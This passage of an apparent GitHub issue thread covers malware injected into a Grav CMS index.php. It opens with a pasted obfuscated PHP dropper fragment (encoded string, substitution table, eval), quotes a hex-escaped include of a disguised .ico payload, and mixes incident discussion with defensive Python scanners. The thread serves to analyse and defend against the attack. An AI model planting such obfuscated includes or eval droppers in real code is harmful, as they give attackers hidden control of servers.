'IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKon_YNBvsw_gEj%I4%If6pWp%M0%IiY%Ii'.
'%Mm%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IKEoAC%IK%If6pWp%M0%Iipb%Ii%Mm%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IKEHsW%I4%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%K'.
'm%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKon_YNBvsw_NCp6%I4%Ir'.
'%Q0%Km%Kl%im';
$rgfsjiogsq = Array('1'=>'j', '0'=>'B', '3'=>'I', '2'=>'N', '5'=>'Z', '4'=>'8', '7'=>'H', '6'=>'d', '9'=>'y', '8'=>'W', 'A'=>'h', 'C'=>'o', 'B'=>'u', 'E'=>'e', 'D'=>'q', 'G'=>'6', 'F'=>'J', 'I'=>'2', 'H'=>'x', 'K'=>'0', 'J'=>'w', 'M'=>'5', 'L'=>'F', 'O'=>'v', 'N'=>'l', 'Q'=>'3', 'P'=>'O', 'S'=>'U', 'R'=>'Q', 'U'=>'T', 'T'=>'S', 'W'=>'t', 'V'=>'Y', 'Y'=>'p', 'X'=>'X', 'Z'=>'L', 'a'=>'f', 'c'=>'E', 'b'=>'k', 'e'=>'1', 'd'=>'K', 'g'=>'r', 'f'=>'4', 'i'=>'7', 'h'=>'b', 'k'=>'R', 'j'=>'m', 'm'=>'D', 'l'=>'A', 'o'=>'c', 'n'=>'s', 'q'=>'C', 'p'=>'a', 's'=>'i', 'r'=>'9', 'u'=>'G', 't'=>'z', 'w'=>'n', 'v'=>'g', 'y'=>'V', 'x'=>'M', 'z'=>'P');
eval/*jlfhbagwmg*/(geaunvl($edkssedkbz, $rgfsjiogsq));
}

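
The two artefacts in this comment and in dimitrilongo's decode above are the things a responder wants to find mechanically across a whole webroot: an include whose path is written as \xNN escapes so it does not grep for "node_modules" or ".ico", and an eval() with a comment wedged between the name and the parenthesis. The following is an added example (not code from Grav or from this thread) that decodes PHP double-quoted string escapes and flags include/require targets that look wrong for application code. The heuristics and the clean sample are my own; the injected sample reproduces the header the OP posted.

```python
"""Decode and flag obfuscated include/require statements in PHP source (added example)."""
import re
import sys

# Constructed sample: the injected header reported at the top of this issue.
INJECTED_INDEX_PHP = r'''<?php
/*07cd0*/

@include "\x2fs\x72v\x2fw\x77w\x2fs\x65r\x6be\x6fr\x67/\x2fn\x6fd\x65_\x6do\x64u\x6ce\x73/\x70a\x74h\x2dr\x6fo\x74-\x72e\x67e\x78/\x66a\x76i\x63o\x6e_\x63e\x615\x656\x2ei\x63o";

/*07cd0*/
namespace Grav;
'''

# Constructed clean counterpart: an ordinary include of a PHP file.
CLEAN_INDEX_PHP = '<?php\nrequire "vendor/autoload.php";\n'

# Escape forms PHP resolves inside double-quoted strings: \xHH, \ooo and the simple ones.
_ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')
_SIMPLE_ESCAPES = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b',
                   'f': '\f', '\\': '\\', '$': '$', '"': '"'}


def decode_php_double_quoted(literal):
    """Return the runtime value of a PHP double-quoted string body (without the quotes)."""
    def _one(m):
        esc = m.group(1)
        if esc[0] == 'x':
            return chr(int(esc[1:], 16))
        if esc[0] in '01234567':
            return chr(int(esc, 8))
        return _SIMPLE_ESCAPES[esc]
    return _ESCAPE_RE.sub(_one, literal)


# include/require with a double-quoted literal argument, optionally wrapped in parens and prefixed with @.
_INCLUDE_RE = re.compile(
    r'(@?)\s*\b(include|include_once|require|require_once)\s*\(?\s*"((?:[^"\\]|\\.)*)"',
    re.IGNORECASE)
PHP_EXTENSIONS = ('.php', '.inc', '.phtml')


def scan_php_source(src):
    """Return one finding per include/require whose target looks wrong for application code."""
    findings = []
    for m in _INCLUDE_RE.finditer(src):
        suppressed, raw = m.group(1) == '@', m.group(3)
        decoded = decode_php_double_quoted(raw)
        reasons = []
        if re.search(r'\\(x[0-9A-Fa-f]|[0-7])', raw):
            reasons.append('path literal is hex/octal-escaped')
        if not decoded.lower().endswith(PHP_EXTENSIONS):
            reasons.append('target does not have a PHP extension')
        if 'node_modules' in decoded:
            reasons.append('target lives under node_modules')
        if suppressed:
            reasons.append('errors suppressed with @')
        if reasons:
            findings.append({'raw': raw, 'decoded': decoded, 'reasons': reasons})
    return findings


# The dropper pasted above ends with eval/*...*/(...): a comment between eval and its
# argument list defeats a naive grep for "eval(".
_EVAL_RE = re.compile(r'\beval\s*(?:/\*.*?\*/\s*)*\(', re.DOTALL)


def has_eval_call(src):
    """True when the source calls eval(), with or without comments between the name and '('."""
    return _EVAL_RE.search(src) is not None


if __name__ == '__main__':
    # Pass PHP files as arguments; with none, the two constructed samples are scanned.
    paths = sys.argv[1:]
    sources = [(p, open(p, encoding='utf-8', errors='replace').read()) for p in paths] \
        or [('<injected sample>', INJECTED_INDEX_PHP), ('<clean sample>', CLEAN_INDEX_PHP)]
    for name, src in sources:
        for f in scan_php_source(src):
            print(f"{name}: include of {f['decoded']!r} ({'; '.join(f['reasons'])})")
        if has_eval_call(src):
            print(f"{name}: eval() call present")
```

Run it over every .php file under the webroot (find . -name '*.php' -print0 | xargs -0 python3 scan.py); a clean Grav tree produces no include findings, and the only eval() hits should be in vendored libraries you can account for.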
avxkim commented 6 years ago

How to check the whole node_modules dir?

rhukster commented 6 years ago

Does that directory that is referenced exist on your server? Is that under your Grav directory or some other place?

avxkim commented 6 years ago

It's the node_modules dir, because I've already deleted all malicious injections from my files with the help of git status.

w00fz commented 6 years ago

Do you have server logs (Apache/php) ?

rhukster commented 6 years ago

But where did the node_modules directory come from? What was the list of packages installed there?

Here's the thing: simply having a line in a Grav index.php file that has some malware loaded doesn't tell us much. It doesn't even mean that Grav was used to install that vulnerability. Grav is just a bunch of files, so if someone gains access to your server, they can edit any file, including one of Grav's. As this vulnerability seems to rely on a file in a node_modules folder, which is something Node.js uses, and Grav doesn't actually have any Node.js stuff in it itself, it seems unlikely it's Grav. But we need to know more about how that malware got there, which might lead us to how that Grav file was modified.

So more questions for you:

avxkim commented 6 years ago

node_modules came from package.json that i've created, it has the following lines:

  "devDependencies": {
    "gulp": "^3.9.1",
    "gulp-clean-css": "^3.9.3",
    "gulp-concat": "^2.6.1",
    "gulp-rename": "^1.2.2",
    "gulp-sass": "^3.1.0",
    "gulp-uglify": "^3.0.0"
  },
  "dependencies": {
    "@fortawesome/fontawesome-free-webfonts": "^1.0.4",
    "bootstrap": "^4.0.0"
  }

Nothing unusual, just some packages for the frontend. Answering your questions:

So can a node package make changes to my files, is that possible at all?

rhukster commented 6 years ago

Well, you shouldn't really ever be doing this kind of development on a live server. You should be doing these kinds of development tasks on your local machine, and only pushing the 'production' CSS and JS to your production server. (https://getgrav.org/blog/development-strategy)

So:

  1. You should do these kinds of CSS/JS development on your local development environment, not production
  2. These files node/gulp etc, should be in the theme, and should NOT be something you push to production

This malware vector is reliant on an ico file in a path-root-regex JS package. This is a real package, but was it installed? Is it compromised? So many unknowns, and we can't really know without seeing the files (which you have deleted).

It's strange that this malware is reliant on something that's not standard in Grav, something that is based on non-standard folders, that you have installed. It seems more a vulnerability coming from that, than from Grav.

We really can't do much more until we see some logs that show anything useful, because right now there are no clues to indicate that anything was compromised in Grav other than the default file being modified, but any malware would look for that file and install things there. So again, not really anything Grav-specific here.

OleVik commented 6 years ago

I've seen this before, and in just about every case it is a result of FTP, SFTP or SSH credentials hijacked or sniffed from insufficiently secure connections. It affecting Grav is not unique, as Grav utilizes an index.php in its root folder. The common employment of this vector is to inject strings into index.php, .htaccess, or other common files.

Apart from not developing on a live server, scrubbing the node_modules directory is entirely safe, as any valid scripts relying on them currently can be rebuilt with a simple npm install on that package.json. @heihachi88, could you please also provide details filling out the report template here? Especially Grav version and installed extensions, the environment details such as server (Ubuntu, Debian, etc), webserver (Apache, Nginx, Caddy, etc), and technologies other than the already listed PHP (for Grav) and Node (used for the other site).

From what I can tell, this has little to do with path-root-regex, and more to do with an automated execution relying on an obscure file in an obscure location. The last time I fixed an issue like this, the most evident trace of activity was revealed in Apache's logs, as an increase in automated attempts to access files that were non-standard to the related software - including Grav, WordPress, and various BB-like forums.

The patch, if I may suggest a solution based on prior experience and intuition, is to immediately revoke all FTP accounts, SSH accounts, and any other system-level access credentials that have been issued. Even if you are the only person you know to have access to the server, you need to lock it down in order to secure further connections. Especially FTP is prone to this, as getting credentials is comparatively easy, but also SFTP and SSH as mentioned above. Generally, for a production server, you always use a unique (one per account and site) private/public key pair with access token, and take care to replace this frequently.

rhukster commented 6 years ago

Good points Ole, just to be safe on the Grav side too, use a non-standard admin path (configurable in admin plugin configuration), non-standard admin account (not admin), and new password, as well as potentially enabling 2FA.

avxkim commented 6 years ago

@OleVik I am not using a password for SSH logins, just the key. I completely disabled logins via passwords long ago; that's why I'm curious how that's even possible. I thought maybe it's a flaw in the Grav Admin plugin's form.

rhukster commented 6 years ago

Anything is possible, but without the access logs we just can't know how they got in.

avxkim commented 6 years ago

I'll create a separate access log for this website and will track this.

OleVik commented 6 years ago

It would also, as I mentioned above, be helpful if you could expand upon the hosting environment:

Especially Grav version and installed extensions, the environment details such as server (Ubuntu, Debian, etc), webserver (Apache, Nginx, Caddy, etc), and technologies other than the already listed PHP (for Grav) and Node (used for the other site).

avxkim commented 6 years ago

Nothing happened yet, since I wiped the whole site and cloned a clean one from my repo. I just changed the admin password to a very difficult one, like DsfXHJLgW4KGeDpGNiRagnFf. I guess they brute-forced the admin form, or it has flaws.

My hosting environment is pretty simple:

  1. Nginx 1.10
  2. php-fpm 7.2
  3. Grav v1.4.3
  4. Admin v1.7.4

Nothing more is installed here; nobody has access to it except myself; password authentication is turned off, using a key to auth; not using FTP (server) on any of my VPSes since 2012.

OleVik commented 6 years ago

@heihachi88 Any more activity since the 22nd? The Login plugin can prevent brute-force attacks, see Rate Limiting.
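The brute-force hypothesis above can be checked against the separate Nginx access log the OP said he would set up. The following is an added example (not code from Grav or its Login plugin): it parses combined-format log lines, keeps a one-minute sliding window of POSTs to the admin route per client address, and flags any client that reaches a threshold inside that window. The log lines, addresses and user agents are constructed; that the login form POSTs to the admin route (`/admin` by default) is an assumption, and a site that has moved its admin path, as recommended above, passes its own route instead.

```python
"""Flag admin-login bursts in Nginx access logs (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed lines in Nginx's default "combined" format; 203.0.113.7 hammers the login form,
# 198.51.100.4 is a legitimate editor logging in once.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [22/Jun/2018:10:15:01 +0000] "GET /admin HTTP/1.1" 200 5123 "-" "python-requests/2.18.4"
203.0.113.7 - - [22/Jun/2018:10:15:02 +0000] "POST /admin HTTP/1.1" 200 5123 "-" "python-requests/2.18.4"
203.0.113.7 - - [22/Jun/2018:10:15:03 +0000] "POST /admin HTTP/1.1" 200 5123 "-" "python-requests/2.18.4"
203.0.113.7 - - [22/Jun/2018:10:15:05 +0000] "POST /admin HTTP/1.1" 200 5123 "-" "python-requests/2.18.4"
203.0.113.7 - - [22/Jun/2018:10:15:08 +0000] "POST /admin HTTP/1.1" 200 5123 "-" "python-requests/2.18.4"
198.51.100.4 - - [22/Jun/2018:10:15:09 +0000] "POST /admin HTTP/1.1" 303 0 "https://example.test/admin" "Mozilla/5.0"
203.0.113.7 - - [22/Jun/2018:10:15:12 +0000] "POST /admin HTTP/1.1" 200 5123 "-" "python-requests/2.18.4"
203.0.113.7 - - [22/Jun/2018:10:15:40 +0000] "POST /admin HTTP/1.1" 200 5123 "-" "python-requests/2.18.4"
203.0.113.7 - - [22/Jun/2018:10:15:41 +0000] "GET /user/pages/index.php HTTP/1.1" 404 162 "-" "python-requests/2.18.4"
198.51.100.4 - - [22/Jun/2018:10:16:30 +0000] "GET /admin/pages HTTP/1.1" 200 9881 "https://example.test/admin" "Mozilla/5.0"
"""

# Nginx "combined" format: ip ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['time'] = datetime.strptime(rec['time'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec


def find_login_bursts(lines, admin_route='/admin', threshold=5, window=timedelta(minutes=1)):
    """Return {ip: info} for clients that POST to admin_route at least `threshold` times within `window`.

    Lines are assumed to be in chronological order, as an access log normally is.
    """
    recent = defaultdict(deque)   # ip -> timestamps of its login POSTs still inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec['method'] != 'POST':
            continue
        # Compare the path without query string or trailing slash against the admin route.
        if rec['path'].split('?', 1)[0].rstrip('/') != admin_route:
            continue
        q = recent[rec['ip']]
        q.append(rec['time'])
        while rec['time'] - q[0] > window:   # drop POSTs that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            info = flagged.setdefault(rec['ip'], {'first_flagged': rec['time'],
                                                  'peak_in_window': 0,
                                                  'agent': rec['agent']})
            info['peak_in_window'] = max(info['peak_in_window'], len(q))
    return flagged


if __name__ == '__main__':
    import sys
    # Pass an access log path as the argument; with none, the constructed sample is analysed.
    source = open(sys.argv[1], encoding='utf-8', errors='replace') if len(sys.argv) > 1 \
        else SAMPLE_ACCESS_LOG.splitlines()
    for ip, info in find_login_bursts(source).items():
        print(f"{ip}: {info['peak_in_window']} login POSTs within a minute "
              f"from {info['first_flagged']} ({info['agent']})")
```

The threshold and window are deliberately loose; a human retrying a mistyped password does not reach five POSTs a minute, while a scripted run does within seconds. Whatever the script reports is also what the Login plugin's rate limiting would have throttled, so the two checks corroborate each other.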

h3artbl33d commented 6 years ago

Personally, I find this issue somewhat disturbing, due to the following concerns:

These three concerns and the title of the issue you have filed are insulting to the developers, are spreading FUD and a false sense of insecurity - or to put it in the famous words: fake news.

I can help you out - but only if you are more thoughtful to those whom you are asking for help in a very blunt and disrespectful manner.

h3artbl33d commented 6 years ago

Moreover, if you would like further assistance, consider the following details relevant:

Personally, I would take drastic measures if a website or webserver was hacked; completely reinstalling the box and walking through the configuration to set everything as secure as possible.

andrewd72 commented 6 years ago

I think the malware disables logging? Using https://malwaredecoder.com/: @ini_set('error_log', NULL); @ini_set('log_errors', 0);

h3artbl33d commented 6 years ago

It doesn't. These two lines merely -try- to disable error logging from PHP. The ini_set should be listed in the disabled_functions directive in php.ini - especially when there is just one user to manage these websites.

Even if that is not the case, ini_set is unable to change the values of Nginx' logging facilities, like the access log, the error log (by Nginx) and other logging facilities that might be in place.

mahagr commented 6 years ago

@h3artbl33d Unfortunately ini_set() is kind of required to make Grav (or any other CMS) work properly with all the server settings.

h3artbl33d commented 6 years ago

Though I completely respect your opinion, I have to disagree. ini_set is merely a hack to change values set in php.ini.

If a server runs several websites, each with a different CMS, it doesn't matter that much. All those PHP functions combined pose no greater or lesser (security) risk than allowing ini_set.

There are methods that mitigate this risk, like chrooting/jailing/caging, every website runs under its own user with its own PHP instance, etc. But few are willing to go through that effort - myself included. Even though I find that attitude lacking to best effort, I do understand that.

Back on topic, @heihachi88, are you willing to investigate as to how this server was infected?

nithinkolekar commented 6 years ago

I thought it was just me and ignored it, assuming it was a misconfiguration in the hosting environment, until I found this thread, which sounds like exactly the problem, i.e. malicious code injected to load favicon_cea5e6.ico.

Additionally, new index.php files were found in user/pages/ and bin/ with the malicious code mentioned by the OP.

As a workaround I created an empty index.php with permissions set to root so that it won't be modified nor created. (Too hackish, I know.)
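A less hackish way to catch what is described in this comment, stray index.php files in directories that should never hold one and a root index.php whose contents changed, is to diff the live tree against a hash manifest taken from the clean checkout: the same idea as the OP's `git status`, but independent of git being on the box. The following is an added example, not Grav's code; the excluded directories, the rule that Grav's only legitimate index.php is the one at the root, and the rule that user/pages holds markdown content and never PHP are assumptions encoded in the script, and the demo tree it builds is constructed.

```python
"""Baseline-vs-live integrity audit for a Grav tree (added example)."""
import hashlib
import os
import tempfile

SKIP_DIRS = {'.git', 'node_modules', 'cache'}   # assumed: not part of the deployed code
EXPECTED_INDEX = {'index.php'}                   # assumed: Grav's only legitimate index.php is at the root
CONTENT_DIRS = ('user/pages/',)                  # assumed: Grav pages are markdown, never PHP


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file (root-relative, '/'-separated) to its SHA-256. Take this from a clean checkout."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            manifest[rel] = sha256_file(full)
    return manifest


def audit_tree(root, baseline):
    """Compare the live tree with the baseline and bucket the differences the way a responder reads them."""
    live = build_manifest(root)
    report = {'modified': [], 'added': [], 'removed': sorted(set(baseline) - set(live)),
              'stray_index': [], 'php_in_content': []}
    for rel, digest in live.items():
        if rel not in baseline:
            report['added'].append(rel)
        elif baseline[rel] != digest:
            report['modified'].append(rel)
        if rel.rsplit('/', 1)[-1] == 'index.php' and rel not in EXPECTED_INDEX:
            report['stray_index'].append(rel)
        if rel.endswith('.php') and rel.startswith(CONTENT_DIRS):
            report['php_in_content'].append(rel)
    for key in report:
        report[key].sort()
    return report


def demo():
    """Constructed scenario: a clean checkout, then the edits a dropper leaves behind; returns the audit."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, text):
            full = os.path.join(root, *rel.split('/'))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, 'w', encoding='utf-8') as fh:
                fh.write(text)
        write('index.php', "<?php\nnamespace Grav;\n")
        write('system/defines.php', "<?php\n")
        write('user/pages/01.home/default.md', "---\ntitle: Home\n---\n")
        baseline = build_manifest(root)          # snapshot of the clean state
        # What this thread reports: a marker block prepended to the root index.php, plus new
        # index.php files in user/pages/ and bin/ (file contents here are constructed stand-ins).
        write('index.php', "<?php\n/*07cd0*/\n@include \"/constructed/path/favicon.ico\";\n"
                           "/*07cd0*/\nnamespace Grav;\n")
        write('user/pages/index.php', "<?php /* constructed dropper stand-in */\n")
        write('bin/index.php', "<?php /* constructed dropper stand-in */\n")
        return audit_tree(root, baseline)


if __name__ == '__main__':
    for bucket, files in demo().items():
        print(f"{bucket}: {files}")
```

In practice, generate the manifest from the repository checkout (or a fresh Grav release plus your theme) and store it off the server, since a manifest kept on the compromised host can be edited by the same access that edited index.php. The 'modified' and 'stray_index' buckets are what to read first; 'added' will also list legitimate uploads and cache files, which is why the exclusion list matters.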

rhukster commented 6 years ago

Do you have logs showing how that file was modified? Also, is this on shared hosting or on a dedicated server? Do other sites run on this server? If so, were any of them compromised?

nithinkolekar commented 6 years ago

I have a VPS (reputed) and have taken a backup of the logs of the last 2 months. But I don't find any suspicious URL where that file got created.

Log with the actual domain name and username changed: grav-log-MayJune2018.zip

Permissions were set as per the official guidelines.

nithinkolekar commented 6 years ago

Do other sites run on this server ?

yes there are some Drupal sites.

If so where any of them compromised ?

Yes (only 1), but that's long back, when ownership of the webroot and directories was mistakenly set to www-data, where just the files and tmp folders are supposed to have that permission. After I set permissions properly it never got compromised. FYI: in Drupal, even if PHP is uploaded to the files or tmp folder, execution of that file will be suppressed with a simple .htaccess. (Maybe you can borrow this trick to make the assets/upload folder not PHP-executable?)